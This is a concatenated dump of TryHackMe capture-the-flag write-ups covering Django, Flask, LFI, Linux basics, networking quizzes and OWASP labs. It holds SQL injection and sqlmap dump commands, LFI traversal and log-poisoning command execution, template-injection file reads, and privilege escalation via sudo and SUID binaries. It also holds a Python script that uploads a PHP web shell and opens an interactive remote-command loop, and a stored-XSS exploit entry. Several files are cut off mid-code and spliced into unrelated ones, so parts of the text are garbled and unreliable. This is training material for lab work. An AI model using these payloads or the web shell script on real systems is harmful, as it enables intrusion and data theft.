7 | - How would we create an app called Forms?
8 |
9 | - `python3 manage.py startapp Forms`
10 |
11 | - How would we run our project to a local network?
12 |
13 | - `python3 manage.py runserver 0.0.0.0:80`
14 |
15 | - Read the above
16 |
17 | no answer needed
18 |
19 | - Flag from GitHub page
20 |
21 | - `THM{**************}`
22 |
23 | - Admin panel flag?
24 |
25 | - Retrieve the `db.sqlite3` file.
26 | - `sqlite3 db.sqlite3`
27 | - `.databases`
28 | - `select * from db.auth_user`
29 | - `THM{************}`
30 |
31 | - User flag?
32 |
33 | - `select * from db.auth_user`
34 | - Go to the PasteBin link
35 | - `hash-identifier`
36 | - Go to [crackstation](https://crackstation.net) and crack the hash
37 | - `su StrangeFox` and enter the cracked password
38 | - `cat ~/user.txt`
39 | - `THM{************}`
40 |
41 | - Hidden flag?
42 |
43 | - `cd ~/messagebox/messagebox`
44 | - `cat * | grep THM`
45 | - `THM{************}`
46 |
47 |
48 |
49 |
50 |
--------------------------------------------------------------------------------
/Introduction-to-Flask/README.md:
--------------------------------------------------------------------------------
1 | # Introduction to Flask
2 |
3 | - Let's go!
4 |
5 | no answer needed
6 |
7 | - Which environment variable do you need to change in order to run Flask?
8 |
9 | - `FLASK_APP`
10 |
11 | - What's the default deployment port used by Flask?
12 |
13 | - `5000`
14 |
15 | - Is it possible to change that port? (yay/nay)
16 |
17 | - `yay`
18 |
19 | - Does Flask support POST requests? (yay/nay)
20 |
21 | - `yay`
22 |
23 | - What markdown language can you use to make templates for Flask?
24 |
25 | - `html`
26 |
27 | - Awesome!
28 |
29 | no answer needed
30 |
31 | - What's inside /home/flask/flag.txt ?
32 |
33 | - Visit `http://:5000/vuln`
34 | - Now add `?name={{person.password}}`
35 | - Now instead use `{{ get_user_file("/etc/passwd") }}`
36 | - And now try with `http://:5000/vuln?name={{%20get_user_file(%22/home/flask/flag.txt%22)%20}}`
37 | - `THM{**************}`
38 |
39 | - See you in the next room!
40 |
41 | no answer needed
42 |
43 |
44 |
45 |
--------------------------------------------------------------------------------
/Introduction-to-OWASP-ZAP/README.md:
--------------------------------------------------------------------------------
1 | # Introduction to OWASP ZAP
2 |
3 | - What does ZAP stand for?
4 |
5 | - `Zed Attack proxy`
6 |
7 | - Connect to the TryHackMe network and deploy the machine. Once deployed, wait a few minutes and visit the web application: http://
8 |
9 | no answer needed
10 |
11 | - I've read the task.
12 |
13 | no answer needed
14 |
15 | - Install ZAP on an operating system of your choice!
16 |
17 | no answer needed
18 |
19 | - Open OWASP ZAP, ready to follow along with this room.
20 |
21 | no answer needed
22 |
23 | - Set up Ajax Spider
24 |
25 | no answer needed
26 |
27 | - What IP do we use for the proxy?
28 |
29 | - `127.0.0.1`
30 |
31 | - Try scanning the DVWA web application as an authenticated user.
32 |
33 | no answer needed
34 |
35 | - Try brute-forcing the DVWA web application.
36 |
37 | no answer needed
38 |
39 | - Use ZAP to bruteforce the DVWA 'brute-force' page. What's the password?
40 |
41 | - `password`
42 |
43 | - Set up HUNT on your Zap application to automatically perform passive scans on sites you visit!
44 |
45 | no answer needed
46 |
47 | - Check out the additional reading material.
48 |
49 | no answer needed
50 |
--------------------------------------------------------------------------------
/JavaScript-Basics/README.md:
--------------------------------------------------------------------------------
1 | # JavaScript Basics
2 |
3 | - Let's Begin
4 |
5 | no answer needed
6 |
7 | - What type of data type is this: 'Neo'?
8 |
9 | - `string`
10 |
11 | - What data type is true/false?
12 |
13 | - `boolean`
14 |
15 | - What is John's occupation?
16 |
17 | - `Master Hacker`
18 |
19 | - What tag is used for linking a JavaScript file to HTML?
20 |
21 | - `script`
22 |
23 | - Congratulations! You can now write conditionals!
24 |
25 | no answer needed
26 |
27 | - Finished with Functions!
28 |
29 | no answer needed
30 |
31 | - What type of brackets are used for arrays?
32 |
33 | - `[]`
34 |
35 | - What color pill did we choose?
36 |
37 | - `red pill`
38 |
39 | - What is the output of this code?
40 |
41 | - `Tyrell`
42 |
43 | - Loops repeat until the written code is finished running (true/false)
44 |
45 | - `true`
46 |
47 | - What loop doesn't require the condition to be true for it to execute at least once?
48 |
49 | - `do...while`
50 |
51 | - What is the DOM?
52 |
53 | - `document object model`
54 |
55 | - What is it called when XSS is used to record keystrokes?
56 |
57 | - `keylogging`
58 |
59 | - JavaScript Basics Master!
60 |
61 | no answer needed
62 |
63 | - Sort the array [1,10,5,15,2,7,28,900,45,18,27]
64 |
65 | - [solution](https://github.com/edoardottt/tryhackme-ctf/blob/main/JavaScript-Basics/sort.js). Try with `node sort.js`.
66 | - `[1,2,5,7,10,18,27,28,45,900]`
67 |
68 |
69 |
70 |
71 |
72 |
--------------------------------------------------------------------------------
/JavaScript-Basics/sort.js:
--------------------------------------------------------------------------------
1 |
2 | function sort(array) {
3 | for (var i=1; i`
6 | - Visit `http://`
7 | - Interesting content here: `http:///item.php?id=5`
8 | - `scilla dir -target `
9 | - `/assets` accessible, but nothing interesting.
10 | - `http:///item.php?id=%27%20OR%201=1%20--%20-`
11 | - WOOHOO.
12 | - `sqlmap -u "http:///item.php?id=1" --dump`
13 | - `****`
14 |
15 | - How many columns does the table have?
16 |
17 | - also with: `http:///item.php?id=5%20union%20select%201,2,3,4,5`
18 | - `5`
19 |
20 | - Whats the system version?
21 |
22 | - `ubuntu **.**`
23 |
24 | - What is dennis' password?
25 |
26 | - `********`
27 |
28 | - Locate and get the first flag contents.
29 |
30 | - `ssh dennis@`, `yes` and enter the password.
31 | - `cat flag1.txt`
32 | - `**************************`
33 |
34 | - Whats the contents of the second flag?
35 |
36 | - `cat .*`
37 | - `cat /boot/grub/fonts/flagTwo.txt`
38 | - `****************************`
39 |
40 | - Whats the contents of the third flag?
41 |
42 | - `cat /home/dennis/.bash_history`
43 | - `****************************`
44 |
45 | - There is no fourth flag.
46 |
47 | no answer needed
48 |
49 | - Whats the contents of the fifth flag?
50 |
51 | - `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
52 | - `sudo python3 -m http.server`
53 | - `wget http://:8000/LinEnum.sh`
54 | - `chmod +x LinEnum.sh`
55 | - `./LinEnum.sh`
56 | - `sudo -l`
57 | - `scp` can be run with sudo without a password.
58 | - https://gtfobins.github.io/gtfobins/scp/#sudo
59 | - `cat /root/root.txt`
60 | - `*************************`
61 |
62 |
63 |
--------------------------------------------------------------------------------
/LFI-Basics/README.md:
--------------------------------------------------------------------------------
1 | # LFI Basics
2 |
3 | - Start the VM and access it using your browser.
4 |
5 | no answer needed
6 |
7 | - Access the first walkthrough, and add a parameter at the end of the link named "?page=".
8 |
9 | no answer needed
10 |
11 | - Let's include the home page. At the "?page=" parameter enter home.html to include the home page.
12 |
13 | no answer needed
14 |
15 | - What's the message you get when you include the home.html?
16 |
17 | `You included home.html`
18 |
19 | - Type /etc/passwd in the parameter to read it.
20 |
21 | no answer needed
22 |
23 | - What user that it's not by default there is present?
24 |
25 | - `lfi`
26 |
27 | - Well done! You've exploited your first local file inclusion!
28 |
29 | no answer needed
30 |
31 | - Now that we know what Directory Traversal is, let's access the second walkthrough.
32 |
33 | no answer needed
34 |
35 | - Add the "?page=" parameter, and try to include the home page again. Does it work (Yes/No)?
36 |
37 | - `No`
38 |
39 | - Use "../" to move one directory up.
40 |
41 | no answer needed
42 |
43 | - What are the credit card numbers?
44 |
45 | - `http:///lfi2/lfi.php?page=../creditcard`
46 | - `****-****-****-****`
47 |
48 | - The same way you can include the passwd file. You'll have to move more directories up. Try reading the passwd file.
49 |
50 | no answer needed
51 |
52 | - `http:///lfi2/lfi.php?page=../../../../../etc/passwd`
53 |
54 | - Well done! You've exploited your first LFI using Directory Traversal.
55 |
56 | no answer needed
57 |
58 | - We got our hands a bit dirty with basic LFI and LFI using path traversal. Let's dig a little deeper, and use log poisoning to get access to the underlying operating system.
59 |
60 | no answer needed
61 |
62 | - We will inject some malicious php code into the server's log.
63 |
64 | no answer needed
65 |
66 | - Access the third walkthrough, add the "?page=" parameter and let's try reading the apache log file.
67 | The log file is located at the following path: /var/log/apache2/access.log
68 |
69 | no answer needed
70 |
71 | - `http:///lfi/lfi.php?page=/var/log/apache2/access.log`
72 |
73 | - Can you read the log?
74 |
75 | - `yes`
76 |
77 | - Forward the request and add your parameter to the link (in my case lfi).
78 | The link becomes: http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=
79 | Now you can execute commands on the system!
80 |
81 | no answer needed
82 |
83 | - Open Burpsuite and set up the proxy.
84 | - Catch a request and edit it as shown, then forward it.
85 | - Add the lfi command to the url.
86 |
87 | - Give it a try and run uname -r. What's the output of the command?
88 |
89 | - `4.15.0-72-generic`
90 |
91 | - With this knowledge read the flag from the lfi user home directory
92 |
93 | - Add the command `ls%20/home/lfi` instead of `uname -r`
94 | - Add the command `cat%20/home/lfi/flag.txt`
95 | - `THM{************22******************}`
96 |
97 |
98 |
--------------------------------------------------------------------------------
/LFI/README.md:
--------------------------------------------------------------------------------
1 | # LFI
2 |
3 | - Deploy the VM and access its web server: `http://`
4 |
5 | no answer needed
6 |
7 | - Look around the website. What is the name of the parameter you found on the website?
8 |
9 | - `page`
10 |
11 | - You can read the interesting files to check out while testing for LFI.
12 |
13 | no answer needed
14 |
15 | - This file can give information about the system like the name of all the existing users on the system.
16 |
17 | no answer needed
18 |
19 | - What is the name of the user on the system?
20 |
21 | - `falcon`
22 |
23 | - Once you find the name of the user, it's important to see if you can include anything common and important in that user's directory; it could be anything, like their .bashrc, etc.
24 |
25 | no answer needed
26 |
27 | - Name of the file which can give you access to falcon's account on the system?
28 |
29 | - `id_rsa`
30 |
31 | - What is the user flag?
32 |
33 | - copy the file `id_rsa` inside your machine
34 | - `chmod 600 id_rsa`
35 | - `ssh falcon@ -i id_rsa`
36 | - `ls`
37 | - `cat user.txt`
38 | - `**********************`
39 |
40 | - What can falcon run as root?
41 |
42 | - `sudo -l`
43 | - `/bin/********`
44 |
45 | - Search gtfobins via the website or by using gtfo tool, to see if you find any way to use that binary for privilege escalation.
46 |
47 | no answer needed
48 |
49 | - What is the root flag?
50 |
51 | - `**********************`
52 |
53 | - Why not complete the LFI beginner level challenge next?
54 |
55 | no answer needed
56 |
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/LazyAdmin/hash.txt:
--------------------------------------------------------------------------------
1 | 42f749ade7f9e195bf475f37a44cafcb
--------------------------------------------------------------------------------
/Linux-Fundamentals/Linux-Fundamentals-Part-1/README.md:
--------------------------------------------------------------------------------
1 | # Linux Fundamentals - Part 1
2 |
3 | - Read the above
4 |
5 | no answer needed
6 |
7 | - Deploy the machine attached to this task!
8 | NOTE: If you have a machine open in the Welcome room (or any other room) please go to that room and terminate it before deploying the machine attached to this task. These machines are not the same, and only the one attached to this room will work.
9 |
10 | no answer needed
11 |
12 | - Read the above
13 |
14 | no answer needed
15 |
16 | - Read the above
17 |
18 | - `ssh shiba1@`
19 | - `yes` and insert password `shiba1`
20 | - When you're into the nootnoot machine as user shiba1 (the shell starts with `shiba1@nootnoot`) type `echo hello`
21 |
22 | - How would you output hello without a newline?
23 |
24 | - `echo -n hello`
25 |
26 | - What flag outputs all entries?
27 |
28 | - `-a`
29 |
30 | - What flag outputs things in a "long list" format?
31 |
32 | - `-l`
33 |
34 | - What flag numbers all output lines?
35 |
36 | - `-n`
37 |
38 | - Read the above!
39 |
40 | no answer needed
41 |
42 | - How would you run a binary called hello using the directory shortcut . ?
43 |
44 | - `./hello`
45 |
46 | - How would you run a binary called hello in your home directory using the shortcut ~ ?
47 |
48 | - `~/hello`
49 |
50 | - How would you run a binary called hello in the previous directory using the shortcut .. ?
51 |
52 | - `../hello`
53 |
54 | - What's the password for shiba2?
55 |
56 | - `touch noot.txt`
57 | - `./shiba1`
58 | - `pinguftw`
59 |
60 | - How do you specify which shell is used when you login?
61 |
62 | - `-s`
63 |
64 | - Join the Linux Fundamentals 2 room, and continue your learning journey: https://tryhackme.com/room/linux2
65 |
66 | no answer needed
67 |
--------------------------------------------------------------------------------
/Linux-Fundamentals/Linux-Fundamentals-Part-2/README.md:
--------------------------------------------------------------------------------
1 | # Linux Fundamentals - Part 2
2 |
3 | - Read the above.
4 |
5 | no answer needed
6 |
7 | - Deploy the machine attached to this task!
8 | NOTE: If you have a machine open in the Welcome room (or any other room) please go to that room and terminate it before deploying the machine attached to this task. These machines are not the same, and only the one attached to this room will work.
9 |
10 | no answer needed
11 |
12 | - Read the above
13 |
14 | no answer needed
15 |
16 | - SSH into the server
17 |
18 | - `ssh shiba2@`
19 | - Type `yes` and enter the password `pinguftw`
20 |
21 | - Read the above
22 |
23 | no answer needed
24 |
25 | - Read the above
26 |
27 | no answer needed
28 |
29 | - How would you set nootnoot equal to 1111?
30 |
31 | - `export nootnoot=1111`
32 |
33 | - What is the value of the home environment variable?
34 |
35 | - `echo $HOME`
36 | - `/home/shiba2`
37 |
38 | - Read the above!
39 |
40 | no answer needed
41 |
42 | - Read the above.
43 |
44 | no answer needed
45 |
46 | - What is shiba3's password?
47 |
48 | - `export test1234=$USER`
49 | - `./shiba2`
50 | - `happynoot******`
51 |
52 | - Read the above.
53 |
54 | no answer needed
55 |
56 | - Read the above!
57 |
58 | no answer needed
59 |
60 | - What permissions mean the user can read the file, the group can read and write to the file, and no one else can read, write or execute the file?
61 |
62 | - `460`
63 |
64 | - What permissions mean the user can read, write, and execute the file, the group can read, write, and execute the file, and everyone else can read, write, and execute the file.
65 |
66 | - `777`
67 |
68 | - How would you change the owner of file to paradox?
69 |
70 | - `chown paradox file`
71 |
72 | - What about the owner and the group of file to paradox?
73 |
74 | - `chown paradox:paradox file`
75 |
76 | - What flag allows you to operate on every file in the directory at once?
77 |
78 | - `-r`
79 |
80 | - What flag deletes every file in a directory?
81 |
82 | - `-r`
83 |
84 | - How do you suppress all warning prompts?
85 |
86 | - `-f`
87 |
88 | - How would you move file to /tmp
89 |
90 | - `mv file /tmp`
91 |
92 | - How would you output twenty to a file called test
93 |
94 | - `echo twenty > test`
95 |
96 | - Read the above
97 |
98 | no answer needed
99 |
100 | - Join the Linux Fundamentals 3 room, and finish learning Linux: https://tryhackme.com/room/linux3
101 |
102 | no answer needed
103 |
104 |
105 |
--------------------------------------------------------------------------------
/Linux-Fundamentals/Linux-Fundamentals-Part-3/README.md:
--------------------------------------------------------------------------------
1 | # Linux Fundamentals - Part 3
2 |
3 | - Read the above
4 |
5 | no answer needed
6 |
7 | - Deploy the machine attached to this task!
8 | NOTE: If you have a machine open in the Welcome room (or any other room) please go to that room and terminate it before deploying the machine attached to this task. These machines are not the same, and only the one attached to this room will work.
9 |
10 | no answer needed
11 |
12 | - `ssh shiba3@`
13 | - Type `yes` and enter the password `happynootnoises`
14 |
15 | - Using relative paths, how would you cd to your home directory.
16 |
17 | - `cd ~`
18 |
19 | - Using absolute paths how would you make a directory called test in /tmp
20 |
21 | - `mkdir /tmp/test`
22 |
23 | - How would I link /home/test/testfile to /tmp/test?
24 |
25 | - `ln /home/test/testfile /tmp/test`
26 |
27 | - How do you find files that have specific permissions?
28 |
29 | - `-perm`
30 |
31 | - How would you find all the files in /home
32 |
33 | - `find /home`
34 |
35 | - How would you find all the files owned by paradox on the whole system
36 |
37 | - `find / -user paradox`
38 |
39 | - What flag lists line numbers for every string found?
40 |
41 | - `-n`
42 |
43 | - How would I search for the string boop in the file aaaa in the directory /tmp
44 |
45 | - `grep boop /tmp/aaaa`
46 |
47 | - What is shiba4's password
48 |
49 | - `mkdir test && touch test/test1234`
50 | - `find / -name shiba4 | grep shiba4 | grep shiba4`
51 | - `/opt/secret/shiba4`
52 | - `test1234`
53 | - `su shiba4` and enter password `test1234`
54 |
55 | - Read the above
56 |
57 | no answer needed
58 |
59 | - How do you specify which user you want to run a command as.
60 |
61 | - `-u`
62 |
63 | - How would I run whoami as user jen?
64 |
65 | - `sudo -u jen whoami`
66 |
67 | - How do you list your current sudo privileges(what commands you can run, who you can run them as etc.)
68 |
69 | - `-l`
70 |
71 | - How would I add the user test to the group test?
72 |
73 | - `sudo usermod -a -G test test`
74 |
75 | - Read the above
76 |
77 | no answer needed
78 |
79 | - Read the above.
80 |
81 | no answer needed
82 |
83 | - Read the above
84 |
85 | no answer needed
86 |
87 | - Read the above
88 |
89 | no answer needed
90 |
91 | - Read the above!
92 |
93 | no answer needed
94 |
95 |
96 |
--------------------------------------------------------------------------------
/Linux:-Local-Enumeration/README.md:
--------------------------------------------------------------------------------
1 | # Linux: Local Enumeration
2 |
3 | - Let's go!
4 |
5 | no answer needed
6 |
7 | - How would you execute /bin/bash with perl?
8 |
9 | - `perl -e 'exec "/bin/bash";'`
10 |
11 | - Where can you usually find the `id_rsa` file? (User = user)
12 |
13 | - `/home/user/.ssh/id_rsa`
14 |
15 | - Is there an `id_rsa` file on the box? (yay/nay)
16 |
17 | - `nay`
18 |
19 | - How would you print machine hardware name only?
20 |
21 | - `uname -m`
22 |
23 | - Where can you find bash history?
24 |
25 | - `~/.bash_history`
26 |
27 | - What's the flag?
28 |
29 | - `********************`
30 |
31 | - Can you read /etc/passwd on the box? (yay/nay)
32 |
33 | - `yay`
34 |
35 | - What's the password you found?
36 |
37 | - `find / -name *.bak -type f 2>/dev/null`
38 | - `cat /var/opt/passwords.bak`
39 | - `************`
40 |
41 | - Did you find a flag?
42 |
43 | - `find / -type f -name "flag.conf" 2>/dev/null`
44 | - `cat /etc/sysconf/flag.conf`
45 | - `**************`
46 |
47 | - Which SUID binary has a way to escalate your privileges on the box?
48 |
49 | - `find / -perm -4000 2>/dev/null`
50 | - `grep`
51 |
52 | - What's the payload you can use to read /etc/shadow with this SUID?
53 |
54 | - `grep '' /etc/shadow`
55 |
56 | - Try using those commands on your system!
57 |
58 | no answer needed
59 |
60 | - Got it!
61 |
62 | no answer needed
63 |
64 | - Read the above and consider completing mentioned rooms.
65 |
66 | no answer needed
67 |
68 |
69 |
70 |
--------------------------------------------------------------------------------
/MAL:-REMnux-The_Redux/README.md:
--------------------------------------------------------------------------------
1 | # MAL: REMnux - The Redux
2 |
3 | - I'm all buckled up and ready to get started.
4 |
5 | no answer needed
6 |
7 | - I've deployed my instance
8 |
9 | no answer needed
10 |
11 | - How many types of categories of "Suspicious elements" are there in "notsuspicious.pdf"
12 |
13 | - `3`
14 |
15 | - Use peepdf to extract the javascript from "notsuspicious.pdf". What is the flag?
16 |
17 | - `THM{Luckily_This_**************+*}`
18 |
19 | - How many types of categories of "Suspicious elements" are there in "advert.pdf"
20 |
21 | - `6`
22 |
23 | - Now use peepdf to extract the javascript from "advert.pdf". What is the value of "cName"?
24 |
25 | - `not************`
26 |
27 | - What is the name of the Macro for "DefinitelyALegitInvoice.doc"
28 |
29 | - `****Legit`
30 |
31 | - What is the URL the Macro in "Taxes2020.doc" would try to launch?
32 |
33 | - `http://tryhackme.com/*************.**`
34 |
35 | - What is the highest file entropy a file can have?
36 |
37 | - `8`
38 |
39 | - What is the lowest file entropy a file can have?
40 |
41 | - `0`
42 |
43 | - Name a common packer that can be used for applications?
44 |
45 | - `UPX`
46 |
47 | - Pretty interesting stuff!
48 |
49 | no answer needed
50 |
51 | - Fin.
52 |
53 | no answer needed
54 |
55 | - I'm curious to read up some more!
56 |
57 | no answer needed
58 |
59 |
60 |
--------------------------------------------------------------------------------
/Networking/README.md:
--------------------------------------------------------------------------------
1 | # Networking
2 |
3 | - How many categories of IPv4 addresses are there?
4 |
5 | - `5`
6 |
7 | - Which type is for research? *Looking for a letter rather than a number here
8 |
9 | - `e`
10 |
11 | - How many private address ranges are there?
12 |
13 | - `3`
14 |
15 | - Which private range is typically used by businesses?
16 |
17 | - `a`
18 |
19 | - There are two common default private ranges for home routers, what is the first one?
20 |
21 | - `192.168.0.0`
22 |
23 | - How about the second common private home range?
24 |
25 | - `192.168.1.0`
26 |
27 | - How many addresses make up a typical class C range? Specifically a /24
28 |
29 | - `256`
30 |
31 | - Of these addresses two are reserved, what is the first address typically reserved as?
32 |
33 | - `network`
34 |
35 | - The very last address in a range is typically reserved as what address type?
36 |
37 | - `broadcast`
38 |
39 | - A third predominant address type is typically reserved for the router, what is the name of this address type?
40 |
41 | - `gateway`
42 |
43 | - Which address is reserved for testing on individual computers?
44 |
45 | - `127.0.0.1`
46 |
47 | - A particularly unique address is reserved for unroutable packets, what is that address? This can also refer to all IPv4 addresses on the local machine.
48 |
49 | - `0.0.0.0`
50 |
51 | - 1001 0010
52 |
53 | - `146`
54 |
55 | - 0111 0111
56 |
57 | - `119`
58 |
59 | - 1111 1111
60 |
61 | - `255`
62 |
63 | - 1100 0101
64 |
65 | - `197`
66 |
67 | - 1111 0110
68 |
69 | - `246`
70 |
71 | - 0001 0011
72 |
73 | - `19`
74 |
75 | - 1000 0001
76 |
77 | - `129`
78 |
79 | - 0011 0001
80 |
81 | - `49`
82 |
83 | - 0111 1000
84 |
85 | - `120`
86 |
87 | - 1111 0000
88 |
89 | - `240`
90 |
91 | - 0011 1011
92 |
93 | - `59`
94 |
95 | - 0000 0111
96 |
97 | - `7`
98 |
99 | - 238
100 |
101 | - `11101110`
102 |
103 | - 34
104 |
105 | - `00100010`
106 |
107 | - 123
108 |
109 | - `01111011`
110 |
111 | - 50
112 |
113 | - `00110010`
114 |
115 | - 255
116 |
117 | - `11111111`
118 |
119 | - 200
120 |
121 | - `11001000`
122 |
123 | - 10
124 |
125 | - `00001010`
126 |
127 | - 138
128 |
129 | - `10001010`
130 |
131 | - 1
132 |
133 | - `00000001`
134 |
135 | - 13
136 |
137 | - `00001011` (note: this bit pattern is 11; 13 in binary is `00001101`)
138 |
139 | - 250
140 |
141 | - `11111010`
142 |
143 | - 114
144 |
145 | - `01110010`
146 |
147 | - 10.240.1.1
148 |
149 | - `a`
150 |
151 | - 150.10.15.0
152 |
153 | - `b`
154 |
155 | - 192.14.2.0
156 |
157 | - `c`
158 |
159 | - 148.17.9.1
160 |
161 | - `b`
162 |
163 | - 193.42.1.1
164 |
165 | - `c`
166 |
167 | - 126.8.156.0
168 |
169 | - `a`
170 |
171 | - 220.200.23.1
172 |
173 | - `c`
174 |
175 | - 230.230.45.58
176 |
177 | - `d`
178 |
179 | - 177.100.18.4
180 |
181 | - `b`
182 |
183 | - 119.18.45.0
184 |
185 | - `a`
186 |
187 | - 117.89.56.45
188 |
189 | - `a`
190 |
191 | - 215.45.45.0
192 |
193 | - `c`
194 |
195 |
196 |
197 |
198 |
199 |
--------------------------------------------------------------------------------
/Ninja-Skills/README.md:
--------------------------------------------------------------------------------
1 | # Ninja Skills
2 |
3 | - Which of the above files are owned by the best-group group? (Enter the answer separated by spaces in alphabetical order.)
4 |
5 | - This is our base command: `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null`
6 | - `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null | xargs ls -alh`
7 | - `D8B3 v2Vb`
8 |
9 | - Which of these files contain an IP address?
10 |
11 | - `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null | xargs grep -Eo "([0-9]{1,3}[\.]){3}[0-9]{1,3}"`
12 | - `oiMO`
13 |
14 | - Which file has the SHA1 hash of 9d54da7584015647ba052173b84d45e8007eba94
15 |
16 | - `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null | xargs sha1sum`
17 | - `c4ZX`
18 |
19 | - Which file contains 230 lines?
20 |
21 | - The solution is `bny0`, but this file does not appear in the `ls` output, so I am probably doing something wrong. (Note that `ls` does not report line counts, so piping the found files to `wc -l` would answer this question directly; also, because the base command sends stderr to `/dev/null`, a file in a directory the current user cannot search would be dropped silently.)
22 |
23 | - Which file's owner has an ID of 502?
24 |
25 | - `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null | xargs ls -ln`
26 | - `X1Uy`
27 |
28 | - Which file is executable by everyone?
29 |
30 | - `find / -type f \( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \) 2>>/dev/null | xargs ls -la`
31 | - `8V2L`
32 |
33 |
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/OWASP-Juice-Shop/ftp/acquisitions.md:
--------------------------------------------------------------------------------
1 | # Planned Acquisitions
2 |
3 | > This document is confidential! Do not distribute!
4 |
5 | Our company plans to acquire several competitors within the next year.
6 | This will have a significant stock market impact as we will elaborate in
7 | detail in the following paragraph:
8 |
9 | Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy
10 | eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam
11 | voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet
12 | clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit
13 | amet. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam
14 | nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat,
15 | sed diam voluptua. At vero eos et accusam et justo duo dolores et ea
16 | rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem
17 | ipsum dolor sit amet.
18 |
19 | Our shareholders will be excited. It's true. No fake news.
20 |
--------------------------------------------------------------------------------
/OWASP-Juice-Shop/ftp/coupons_2013.md.bak%00..md:
--------------------------------------------------------------------------------
1 | n'
25 |
26 | file = {'image': (random_file + '.php', payload, 'text/php')}
27 | print('> Attempting to upload PHP web shell...')
28 | r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
29 | print('> Verifying shell upload...')
30 | r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
31 |
32 | if random_file in r.text:
33 | print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
34 | print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
35 | launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
36 | if launch_shell.lower() == 'y':
37 | while True:
38 | cmd = str(input('RCE $ '))
39 | if cmd == 'exit':
40 | sys.exit(0)
41 | r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
42 | print(r.text)
43 | else:
44 | if r.status_code == 200:
45 | print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
46 | else:
47 | print('> Web shell failed to upload! The web server may not have write permissions.')
--------------------------------------------------------------------------------
/OWASP-Top-10/48973.txt:
--------------------------------------------------------------------------------
1 | # Exploit Title: CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting
2 | # Date: 30/10/2020
3 | # Exploit Author: Vyshnav NK
4 | # Vendor Homepage: https://projectworlds.in/
5 | # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
6 | # Version: 1.0
7 | # Tested on: Windows 10 and Windows 7
8 |
9 | CSE Bookstore is vulnerable to persistent cross-site scripting in checkout.php and cart.php, where a user is able to enter the quantity as an XSS payload; once it has been added, the payload triggers as stored XSS every time the MyCart option is clicked.
10 |
11 | The URLs below can be accessed by a regular user.
12 |
13 | URL : http://localhost/php/checkout.php and http://localhost/php/cart.php
14 |
15 | Payload : ">